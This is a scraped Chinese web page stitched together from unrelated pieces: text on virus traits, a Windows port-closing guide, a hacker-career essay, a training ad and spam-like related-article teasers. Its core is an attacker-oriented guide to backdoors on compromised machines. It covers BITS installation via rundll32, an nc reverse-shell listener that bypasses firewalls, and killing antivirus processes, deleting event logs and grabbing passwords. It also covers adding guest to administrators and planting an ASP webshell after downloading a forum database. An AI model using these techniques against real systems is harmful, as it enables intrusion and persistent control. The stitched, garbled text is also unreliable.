  自我更新性是近年来病毒的又一新特征。病毒可以借助于 *** 进行变种更新,得到最新的免杀版本的病毒并继续在用户感染的计算机上运行,比如熊猫烧香病毒的作者就创建了“病毒升级服务器”,在最勤时一天要对病毒升级8次,比有些杀毒软件病毒库的更新速度还快,所以就造成了杀毒软件无法识别病毒。

  除了自身免杀自我更新之外,很多病毒还具有了对抗它的“天敌”杀毒软件和防火墙产品反病毒软件的全新特征,只要病毒运行后,病毒会自动破坏中毒者计算机上安装的杀毒软件和防火墙产品,如病毒自身驱动级Rootkit保护强制检测并退出杀毒软件进程,可以过主流杀毒软件“主动防御”和穿透软、硬件还原的机器狗,自动修改系统时间导致一些杀毒软件厂商的正版认证作废以致杀毒软件作废,从而病毒生存能力更加强大。

  免杀技术的泛滥使得同一种原型病毒理论上可以派生出近乎无穷无尽的变种,给依赖于特征码技术检测的杀毒软件带来很大困扰。近年来,国际反病毒行业普遍开展了各种前瞻性技术研究,试图扭转过分依赖特征码所产生的不利局面。目前比较有代表性产品的是基于虚拟机技术的启发式扫描软件,代表厂商NOD32,Dr.Web,和基于行为分析技术的主动防御软件,代表厂商中国的微点主动防御软件等。 [32]

  解读词条背后的知识

  病毒原理

  【病毒和木马区别:】

  win7关闭3389端口的步骤:

  

  最简便办法关闭端口的办法

  打开控制面板à防火墙à选择高级设置—》窗口左侧,点击入站规则——右侧出现新建规则,点击新建规则-》选中端口——

  选择协议和端口—》在特定本地端口添加要关闭的端口。包括445,135,137,138,139 用逗号隔开à选择阻止连接à

  添加名称(端口封闭)和描述(445,135,137,138,139等)。选择完成。

  关闭防火墙是否就默认所有端口打开 默认的应该是不防护已开放端口了,防火墙只不过在开启的时候会对这些端口做防护而已。比如80端口,你只有做了web应用,如【iis服务器上才会打开80端口,这时候防火墙可能会保护80端口,使外面的用户无法访问】但关闭了防火墙,防护取消就可以正常访问了。

  Windows有很多端口是开放的,在你上网的时候, *** 病毒和黑客可以通过这些端口连上你的电脑。

  为了让你的系统变为铜墙铁壁,应该封闭这些端口,主要有:TCP 135、139、445、593、1025 端口和 UDP 135、137、138、445 端口,一些流行病毒的后门端口(如 TCP 2745、3127、6129 端口),以及远程服务访问端口3389。

  三、DOS命令和黑客工具

  学习到知识后,我们需要执行操作,那么命令和工具就是必不可少的了。大家都知道,DOS命令是黑客必须掌握的技术,当然现在的图形界面也可以实现相应的功能,但是远不如DOS命令来的便捷和深入,要知道,图形界面都是多次开发以适应大家日常生活直观来使用的,而DOS命令更加接近计算机语言,同时也能让我们更加清晰的了解到工作原理。例如前几期我们讲到的ping命令等等。黑客工具同样,例如Xscan用来扫描计算机时候存在漏洞等等。

  四、主流的编程语言及脚本语言

  如果想成为一名真正的黑客,编程语言就是我们需要掌握的高级技巧了,编程语言主要用来编写相应的黑客工具及脚本。如果们停留在这一步,那么我们只能够使用别的高级黑客编写的工具来执行自己的想法,当然,这是完全可以的,在入门的时候,我们必定要使用前辈留下来的工具,来检验我们学到的知识,也能够完成一部分我们想要执行的操作。等技术到了一定境界,下载到的工具已经无法实现我们的构思时,我们就要开始自己编写了。而这也是我们走向一名高级黑客的必经之路。

  如果对以上的四条内容你并不陌生,那么恭喜你,你有成为一名黑客的潜质。

  如果你对以上四条内容熟悉掌握,那么你显然就是一名黑客。

  如果你什么都没有看懂,但是你对黑客技术有着极大的渴望和心趣,那么也不必担心,这个世界上,没有学不到的知识,只有懒惰的人!

  作者:科技大魔王

  链接:

  來源:简书

  简书著作权归作者所有,任何形式的转载都请联系作者获得授权并注明出处。

  ( 4 )后门

  后门程序(backdoor)

  后门程序:一般是指那些绕过安全性控制而获取对程序或系统访问权的程序 *** 。在软件的开发阶段,程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。但是,如果这些后门被其他人知道,或是在发布软件之前没有删除后门程序,那么它就成了安全风险,容易被黑客当成漏洞进行攻击。

  后门原理

  后门程序就是留在计算机系统中,供某位特殊使用者通过某种特殊方式控制计算机系统的途径。 [1]

  后门程序,跟我们通常所说的"木马"有联系也有区别。联系在于:都是隐藏在用户系统中向外发送信息,而且本身具有一定权限,以便远程机器对本机的控制。区别在于:木马是一个完整的软件,而后门则体积较小且功能都很单一。后门程序类似于特洛依木马(简称"木马"),其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作。

  后门程序和电脑病毒更大的差别,在于后门程序不一定有自我复制的动作,也就是后门程序不一定会“感染”其它电脑。

  后门是一种登录系统的 *** ,它不仅绕过系统已有的安全设置,而且还能挫败系统上各种增强的安全设置。

  而且,在病毒命名中,后门一般带有backdoor字样,而木马一般则是Trojan字样。

  特点

  后门包括从简单到奇特,有很多的类型。简单的后门可能只是建立一个新的账号,或者接管一个很少使用的账号;复杂的后门(包括木马)可能会绕过系统的安全认证而对系统有安全存取权。例如一个login程序,当你输入特定的密码时,你就能以管理员的权限来存取系统。

  后门能相互关联,而且这个 技术被许多黑客所使用。例如,黑客可能使用密码破解一个或多个账号密码,黑客可能会建立一个或多个账号。一个黑客可以存取这个系统,黑客可能使用一些

  技术或利用系统的某个漏洞来提升权限。黑客可能会对系统的配置文件进行小部分的修改,以降低系统的防卫性能。也可能会安装一个木马程序,使系统打开一个安全漏洞,以利于黑客完全掌握系统。

  分类

  后门可以按照很多方式来分类,标准不同自然分类就不同,为了便于大家理解,我们从技术方面来考虑后门程序的分类 *** :

  此类后门程序一般都是服务器上正常 的web服务来构造自己的连接方式,比如非常流行的ASP、cgi脚本后门等。

  网页后门, *** 上针对系统漏洞的攻击事件渐渐少了,因为大家在认识到 *** 安全的重要性之后,最简单却又最有效的防护办法:升级,都被大家所认同,所以系统漏洞在以后的岁月中存活的周期会越来越短,而从最近的趋势来看,脚本漏洞已经渐渐取代了系统漏洞的地位,非常多的人开始研究起脚本漏洞来,sql注入也开始成为各大安全站点首要关注热点,找到提升权限的突破口,进而拿到服务器的系统权限。

  asp、CGI、PHP这三个脚本大类在 *** 上的普遍运用带来了脚本后门在这三方面的发展。

  线程插入后门

  利用系统自身的某个服务或者线程,将后门程序插入到其中,具体原理原来《黑客防线》曾具体讲解过,感兴趣的朋友可以查阅。这也是现在更流行的一个后门技术。

  扩展后门

  所谓的“扩展”,是指在功能上有大的提升,比普通的单一功能的后门有很强的使用性,这种后门本身就相当于一个小的安全工具包,能实现非常多的常见安全功能,适合新手使用————但是,功能越强,个人觉得反而脱离了后门“隐蔽”的初衷,具体看法就看各位使用者的喜好了。

  c/s后门

  和传统的木马程序类似的控制 *** ,采用“客户端/服务端”的控制方式,通过某种特定的访问方式来启动后门进而控制服务器。

  root kit 6o f3H 3B

  这个需要单独说明,其实把它单独列一个类在这里是不太恰当的,但是,root kit的出现大大改变了后门程序的思维角度和使用理念,可以说一个好的root kit就是一个完全的系统杀手!后文我们讲涉及到这方面,一定不会让大家失望!

  上面是按照技术做的分类,除了这些方面,正向连接后门、反向连接后门等分类也是很常见的,其实如何分类是编程者考虑的事,广大的使用者就不用考虑那么多了,我们看重的,只是功能!

  首先我们来简单解释一下什么是典型的"线程插入"后门:这种后门在运行时没有进程,所有 *** 操作均播入到其他应用程序的进程中完成。也就是说,即使受控制端安装的防火墙拥有“应用程序访问权限”的功能,也不能对这样的后门进行有效的警告和拦截,也就使对方的防火墙形同虚设了!因为对它的查杀比较困难,这种后门本身的功能比较强大,是“居中家旅行、入侵攻击”的必备品哦! [2]

  这类的典范就是国内提倡 *** 共享的小榕的BITS了,从它的推出以来,各类安全工具下载园地里BITS就高居榜首,非常多的朋友使用它的过程中感到了方便

  使用范围:wind200/xp/2003

  隐蔽程序:★★★★☆

  使用难度:★★★☆☆

  查杀难度:★★★★☆

  BITS其实是Background Intelligent Transfer Servicer的缩写,可以在不知不觉中实现另一种意义的典型的线程插入后门,有以下特点:进程管理器中看不到;平时没有端口,只是在系统中充当卧底的角色;提供正向连接和反向连接两种功能;仅适合用于windows 200/xp/2003。

  运用举例

  首先我们用3389登录上肉鸡,确定你有SYSTEM的权限,将BITS.DLL拷贝到服务器上,执行CMD命令: 4 #R Br A

  rundll32.exebits.dll,install

  这样就激活了BIST,程序用这个特征的字符来辨认使用者,也就相当于你的密码了,然后卸载:rundll32.exe BITS.dll,Uninstall

  这是最简单的使用,这个后门除了隐蔽性好外,还有两大特点是非常 值得借鉴的:端口复用和正反向连接。虽然很多朋友经常听到这两个名词,但并不了解它们,端口复用就是利用系统正常的TCP端口通讯和控制,比如80、139等,这样的后门有个非常 大的好处就是非常 隐蔽,不用自己开端口也不会暴露自己的访问,因为通讯本身就是系统的正常访问!另一个是反向连接,这个很常 见,也是后门中一个经典思路,因为从服务器上主动方问外边是不被禁止的,很多很历害的防火墙就怕这点!

  BITS的正向连接很简单,大家可以参考它的README,这种方式在服务器没有防火墙等措施的时候很管用,可以方便地连接,但是遇到有防火墙这样的方式就不灵了,得使用下面的反向连接方式: 70 +g3l

  在本地使用NC监听(如:nc -l -p 1234)

  用NC连接目标主机的任何一个防火墙允许的TCP端口(80/139/445……)

  输入激活命令:[email=hkfx@dancewithdolphin[rxell]:1.1.1.1:2222]hkfx@dancewithdolphin[rxell]:1.1.1.1:2222[/email] ^q/hQ , 4

  目标主机的CMD将会出现NC监听的端口2222,这样就实现了绕过防火墙的功能了。

  所谓的扩展后门,在普通意义上理解,可以看成是将非常多的功能集成到了后门里,让后门本身就可以实现很多功能,方便直接控制肉鸡或者服务器,这类的后门非常受初学者的喜爱,通常集成了文件上传/下载、系统用户检测、HTTP访问、终端安装、端口开放、启动/停止服务等功能,本身就是个小的工具包,功能强大。

  Wineggdroup shell j;类型:系统后门

  使用范围:win2000/xp/2003

  隐蔽程度:★★★★☆

  使用难度:★★☆☆☆

  危害程度:★★★★☆

  查杀难度:★★★★☆

  

  扩展后门

  这个后门是扩展后门中很有代表性的一个,功能这全面让人叹为观止,它能实现如下比较有特色的功能:进程管理,可查看,杀进程(支持用进程名或PID来杀进程);注册表管现(查看,删除,增加等功能);服务管理(停止,启动,枚举,配置,删除服务等功能)端口到程序关联功能(fport);系统重启,关电源,注销等功能(reboot,poweroff,shutdown,logoff);嗅探密码功能;安装终端,修改终端端口功能;端口重定向功能(多线程,并且可限制连接者IP);HTTP服务功能(多线程,并且可限制连接者IP);Socd5 *** 功能(支持两种不同方式验证,可限制连接者IP);克隆账号,检测克隆账户功能(clone,checkclone);加强了的FindpassWord功能(可以得到所有登录用户,包括使用克隆账户远程登录用户密码);HTTP *** (完全匿名,支持oicq、 MSN、mirc等程序);其他辅助功能,http下载,删除日志,系统信息,恢复常用关联,枚举系统账户等。

  当 *** 上刚推出这个后门的时候,非常多的人用它来替换自己原来使用的后门,一时间各处赞扬之声迭起,但多为一些普通的打捞手的心声,其实它和“后门”的原始定义是有出入的:一旦你需要实现越多的功能,那你的程序在执行、隐藏、稳定等方面就需要考虑非常多的问题,一个疏忽就会导致全盘皆败,所以不建议将此后门用在需要非常隐蔽的地方。

  运用举例

  在安装后门前,需要使用它自带的EditServer.exe程序对服务端进行非常详细的配置,从10个具体配置中,包括了插入线程、密码、IP登录邮件通告等方面,不难看出它的功能是非常强大的,隐蔽性也很强,下面说几个在入侵中常用的功能,相信经常玩入侵的朋友一定能发现它的强大之处: [2]

  Fport:列出进程到端口的列表,用于发现系统中运行程序所对应的端口,可以用来检测常见的隐蔽的后门。

  Reboot:重启系统,如果你上传并运行了其他后门程序,并需要重启机器以便让后门正常工作,那使用这个命令吧! Uz

  Shell:得到一个Dos Shell,这个不多讲了,直接得到服务器或者肉鸡上的cmd shell。

  Pskill PID或程序名:用于杀掉特定的服务,比如杀毒软件或者是防火墙。

  Execute程序:在后台中执行程序,比如sniffer等。文件名 保存文件名:下载程序,直接从网上down一个后门到服务器上。

  Installterm端口:在没有安装终端服务的win2k服务版的系统中安装终端服务,重启系统后才生效,并可以自定义连接端口,比如不用3389而用其他端口。

  StopService/StartService:停止或者启动某个系统服务,比如telnet。

  CleanEvent:删除系统日志。

  Redirect:TCP数据转发,这个功能是后门程序中非常出色的一个功能,可以通过某一端口的数据转发来控制内网的机器,在渗透入侵的时候非常管用!

  EnumService:列举所有自动启动的服务的资料,比如后门、木马。

  RegEdit:进入注册表操作模式,熟悉注册表的使用者终于在后门中找到了福音! !

  Findpassword:得到所有登录用户密码,比我们常用的findpass功能可强多了。

  总体来讲,Wineggdrop shell是后门程序中很出彩的一个,它经过作者几次大规模的修改和升级,已经趋于稳定,功能的强大当然没得说,但是由于功能太强大,被查杀和怀疑是难以避免的,所以很多人在使用Wineggdrop shell一段时间后就发现肉鸡飞了,其实是很正常的事,我你出不用气馁,其实用很简单的 *** 就可以很好地提高它的隐蔽性,下文将有说明。

  相对于Wineggdrop shell来说,独孤剑客的winshell在功能上就不那么全面了,但是笔者推荐新手更多的使用winshell而不是Wineggdrop shell,因为winshell功能除了获得一个shell以外,只加入了一些重启、关闭服务器的命令,功能相对简单,但完全使用系统自带的cmd来执行命令,对系统学习和掌握也是非常有帮助的!

  Winshell和wolf这两者都是国内早期顶尖的后门程序,程序的编制无疑是非常经典的,新手学习时使用这两款后门一定能让你明白很多系统相关东西,了解很多入侵思路和 *** 。

  传统的木马程序常常使用C/S构架,这样的构架很方便控制,也在一定程度上避免了“万能密码”的情况出现,对后门私有化有一定的贡献,这方面分类比较模糊,很多后门可以归结到此类中,比如较巧妙的就是ICMP Door了

  类型:系统后门

  使用范围:win2000/xp/2003 2Z6

  隐蔽程度:★★★★★ 使用难度:★★★☆☆ 危害程度:★★★★☆ 查杀难度:★★★★★

  这个后门利用ICMP通道进行通信,所以不开任何端口,只是利用系统本身的ICMP包进行控制安装成系统服务后,开机自动运行,可以穿透很多防火墙——很明显可以看出它的更大特点:不开任何端口~只通过ICMP控制!和上面任何一款后门程序相比,它的控制方式是很特殊的,连80端口都不用开放,不得不佩服务程序编制都在这方面独特的思维角度和眼光!

  运用举例

  这个后门其实用途最广的地方在于突破网关后对内网计算机的控制,因为很多机密数据都是放在内网计算机上的,而控制内网计算机并不是我们想到位的商业 *** 进行入侵检测,它的 *** 内部并不像我们常见的内网那样非常容易入侵和控制,因为该公司本身涉及到一些 *** 安全的服务,所以内网个人计算机的防护是很到位的,在尝试过很多后门后,最后ICMP Door帮我实现了成功的渗透内网!由此笔者开始爱上这个后门。

  首先使用icmpsrv.exe -install参数进行后门的安装,再使用icmpsend.exe IP进行控制,可以用:方式下载文件,保存在[url=目录下,文件名为hkfx.exe,程序名前的“-”不能省去,使用[pslist]还可以列出远程主机的进程名称和pid,再使用[pskill id]就可以杀进程了,同样,输入普通cmd命令,则远程主机也就执行了相关的命令。 ~HF1 %

  这个后门是采用的c/s构架,必须要使用icmpsend才能激活服务器,但是他也有自己的先天不足:后门依靠ICMP进行通讯,经过冲击波的洗礼后,很少有服务器还接受ICMP包了,很多都屏蔽掉了它,所以用它来控制服务器不是一个好办法,这也是我为什么用它来控制内网计算机的原因了——内网很少有人屏蔽ICMP包吧

  账号后门技术是指黑客为了长期控制目标计算机,通过后门在目标计算机中建立一个备用管理员账户的技术。一般采用克隆账户技术。克隆账户一般有两种方式,一个是手动克隆账户,一个是使用克隆工具。 [1]

  程序案例:海阳顶端

  这是ASP脚本方面流传非常广的一个脚本后门了,在经过几次大的改革后,推出了“海阳顶端ASP木马XP版”、“海阳顶端ASP木马红粉佳人版”等功能强大、使用方便的后门,想必经常接触脚本安全的朋友对这些都不会陌生。

  类型:网页木马

  

  服务器系统配置都相对安全,公开的系统漏洞存在的机会很少,于是脚本方面的漏洞就开始火起来。首先我们通过某种途径获得一个服务器的页面权限(比如利用论坛上传达室类型未严格设置、SQL注入后获得ASP系统的上传权限、对已知物理路径的服务器上传特定程序),然后我们可以通过简单的上传ASP程序或者是直接复制海阳项端的代码,然后通过WEB访问这个程序,就能很方便地查阅服务器上的资料了,下面举个简单的便子(由于只是简单的介绍,下文便子不会太难或者太普遍,希望大家理解)。

  leadbbs2.77曾经风靡 *** ,它是个很典型的ASP论坛,屏蔽了很多可以SQL注入的寺方,但是很多傻瓜级别的 *** 管理员总是喜欢默认安装,然后启用论坛,我们只需要很简单地在IE中输入:WWW。***。COM/BBS/DATA/LEADBBS。MDB就能够直接下载该论坛的数据库了,而且没有MD5加密哦!我们直接找到管理员的账户和密码,然后登录论坛,到管理界面将论坛的“联系我们”、“帮助”等ASP文件替换成我们的海阳项端代码,然后执行GUEST权限的CMD命令,方便的上传/下载将定程序、远程执行程序等,这样一个隐藏的后门就建好了!取得服务器的SYSTEM权限就看大家自己的办法了。

  一般来讲,海洋的功能是非常强大的,而且不容易被查杀(一个朋友采取的方式是:先利用某个脚本漏洞上传网页后门,再通过海洋上传另一个后门到隐蔽的路径,然后通过最后上传的后门来删除之一次上传的海洋,这样后门的存放路径就可以放得非常深了,普通管理员是很难发现的),如果管理员觉得自己可能中了这里边样的后门,可以利用论坛备份来恢复自己的页面系统,再配合系统日志、论坛日志等程序检查系统,发现可疑ASP文件打开看看海洋是很好识别的,再删除就可以了。

  脚本方面的后门还有CGI和PHP两面三刀大类,使用原理都差不多,这里就不再多介绍,在黑防论坛也收录了这三种后门,大家可以下载后自己研究。

  类型:系统后门

  使用范围:win200/xp/2003

  隐蔽程度:★★★★☆

  使用难度:★★☆☆☆

  危害程序:★★★★☆

  查杀难度:★★★☆☆

  同BITS一样,Devil5也是线程插入式的后门,和BITS不同的是它可以很方便的在GUI界面下按照自己的使用习惯定制端口和需要插入的线程,适合对系统有一定了解的使用都使用,由于是自定义插入线程,所以它更难被查杀,下面我们来看看它的使用。

  道德使用它自带的配置程序EDITDEVIL5.EXE对后门进行常规的配置,包括控制端口、插入线程、连接密码、时间间隔等方面关键点是对插入线程的定制,一般设置成系统自带的SVCHOST,然后运行后门就可以控制了。

  我们用TELNET连接上去,连接的格式是:TELNET *** 定制的端口,它和其他后门不同之处在于连接后没有提示的界面,每次执行程序也是分开的,必须要每次都有输入密码,比如我们丢掉了服务器和管账户,可以激活GUEST后再将GUEST加到管理员权限,记得每次执行命令后加上“>密码”就可以了:net localgroup administrators guest /add >hkfx,然后你又可以控制服务器了。

  很明显示,同榕哥的BITS相比,DEVIL5有一些缺陷:不能通过系统自带端口通讯、执行命令比较麻烦,需要每次输入密码而且不回显示输入内容,很容易出错。但是,它有自己的优势:插入线程可以自已定制,比如设置IE的线程为插入的目标就比较难被查杀:自己提供了专门的查杀工具DELDEVIL5.exe,帮助防护者清理系统;而且它可以任意改名和绑定,使用灵活性上比BITS强……大家选择哪能款就看自己的喜好了。

  另外,PortLess BackDoor等工具也是此类的后门,功能强大,隐蔽性稍差,大家有兴趣可以自己研究一下。

  如果说上面的后门程序都各有千秋、各有所长的话,它们和经典的root kit 一比简直就是小巫见大巫了,那究竟什么样是root kit呢

  root kit出现于20世纪90年代初,在1994年2月的一篇安全咨询报告中首先使用了root kit这个名词。从出现至今,root kit 的技术发展非常迅速,应用越来越广泛,检测难度也越来越大。其中钍对SunOS和Linux两种操作系统的root kit最多。

  很多人有一个误解,他们认为root kit 是用作获得系统root访问权限的工具。实际上,root kit是攻击都用来隐蔽自己的踪迹和保留root访问权限的工具。通常,攻击者通过远程攻击获得root访问权限,进入系统后,攻击者会在侵入的主机中安装root kit,然后他将经常通过root kit的后门检查系统是否有其他的用户登录,如果只有自己,攻击者就开始着手清理日志中的有关信息。通过root kit的嗅探器获得其他系统的用户和密码之后,攻击者就会利用这些信息侵入其他系统。

  从*nix系统上迁移到windows系统下的root kit完全沿袭了这些“可怕”的功能! *** 上常见的root kit 是内核级后门软件,用户可以通过它隐藏文件、进程、系统服、系统驱动、注册表键和键值、打开的端口以及虚构可用磁盘窨。程序同时也在内存中伪装它所做的改动,并且隐身地控制被隐藏进程。程序安装隐藏后门,注册隐藏系统服务并且安装系统驱动。该后门技术允许植入reDirector,是非常难以查杀的一个东东,让很多 *** 管员非常头疼!

  著名后门

  最著名的后门程序,该算是微软的Windows Update了。Windows Update的动作不外乎以下三个:开机时自动连上微软的网站,将电脑的现况报告给网站以进行处理,网站通过Windows Update程序通知使用者是否有必须更新的文件,以及如何更新。如果我们针对这些动作进行分析,则“开机时自动连上微软网站”的动作就是后门程序特性中的“潜伏”,而“将电脑现况报告”的动作是“搜集信息”。因此,虽然微软“信誓旦旦”地说它不会搜集个人电脑中的信息,但如果我们从Windows Update来进行分析的话,就会发现它必须搜集个人电脑的信息才能进行操作,所差者只是搜集了哪些信息而已。

  

  电脑 *** 中的“后门”即是 *** 的漏洞

  简单反黑客远程控制后门的 *** :

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  2019年10月08日 18:46:13

  作者:必火

  阅读数:750005

   *** 安全渗透测试北京实地培训,五个月华丽蜕变,零元入学,报名联系:18622800700(手机同微信)。全国诚招招生 *** ,更低2000元起

  因为 *** 安全工程师给人一种很厉害的感觉,或者说很酷。当然薪资也是异常的丰厚。所以不少年轻人选择成为一名 *** 安全工程师。但是却不知道要如何才能成为一名 *** 安全工程师。其实 *** 安全工程师具体的还是看企业对这个岗位的要求,比如一个正常的企业的官网和购物网站的官网对于 *** 安全工程师的要求也都不同。一般来说 *** 工程师这个职业的人大多毕业于计算机科学与技术专业。他们会精通一到两门编程语言。熟悉 *** 环境的搭建。也懂得 *** 数据交互的原理。这些都是 *** 安全工程师的必备技能。

  1. 技能证书:

   *** 安全工程师拥有一些国家承认的技能资格证书,这些证书是很多大企业招 *** 安全工程师的必备条件,也是一块敲门砖。比如CCSP认证、再比如 *** 与信息安全系统工程师认证等许多的认证证书。这些证书自然是越多越好。因为每个企业的侧重点不同,所需要的证书也不尽相同,所以这些证书是多多益善,都能帮助你早日找到适合的 *** 安全工程师岗位。

  2. 工作经历:

  应届毕业生是很难找到 *** 安全工程师的工作的。没有哪个企业愿意把自己的安全交给一个刚毕业乳臭未干的毛头小子。有人说那岂不是没办法成为一名 *** 安全工程师了吗?也不尽然,因为大部分有 *** 安全工程师的企业都不会就只有一名 *** 安全工程师。所以一般新人都需要跟随资深的 *** 安全工程师学习,就好像师傅带徒弟一样,带着你熟悉工作流程的每一个步骤,每一个细节。直到你可以独当一面的时候,你才算是一名合格的 *** 安全工程师。

相关文章

威海黑客(山东济南黑客)

威海黑客(山东济南黑客)

本文目录一览: 1、李俊 被捕过程 2、俄罗斯前几年放出来的黑客 3、熊猫烧香是怎么回事?该怎么解决? 4、公安网警主要破案的技术手段是什么 5、中学生网络安全知识_中学生上网安全注意...

有没有一种软件可以查我媳妇同时接收微信语音

宝宝年龄较小的时候服用药物的剂量也必须少,过多反而会危机身体健康,有些药片太大容易吐出来,引起呕吐,喝不下去等问题,那么婴儿服药呕吐需要补服吗?下面友谊长存小编带来介绍。 婴儿服药呕吐需要补服吗?...

张家界市广州高端商务陪伴儿招聘

滨州市河南模特预约 注册时间:2019-8-6为了真实、安全、靠谱,泰州外国模特看图预约,但联系方式:微信号、qq群、电话、电话手机号码只对会员提供!职业:走秀模特生肖:牛 商务成都 体形:V型星座:...

系统备份工具如何备份系统

  电脑操作系统实际上也是一种程序流程,是电脑管理管理程序,只不过是这一程序流程略微繁杂了一些,在应用全过程中也非常容易出現一些难题。对于此事,我给大伙儿产生了系统软件备份工具系统备份的文图实例教程,...

《复仇者联盟2:奥创纪元》导演乔斯·韦登:原

众所周知,在《复仇者联盟2:奥创纪米》中,幻视是没有丁丁的,但是据幻视演员保罗·贝坦尼在采访中表示,导演乔斯·韦登曾经是想给幻视做个丁丁的。 幻视的演员保罗·贝坦尼接受采访时...

贵州一小区高层现金被吹落-贵州一小区下钞票雨

相信大家听到钞票雨都会觉得非常的有趣,但确实这件事情最近就有发生过,据最新消息报道贵州一小区高层现金被吹落,当时路过的学生在下面捡起来并且交给了民警,这种行为其实在大家看来是非常值得表扬的,那么接下来...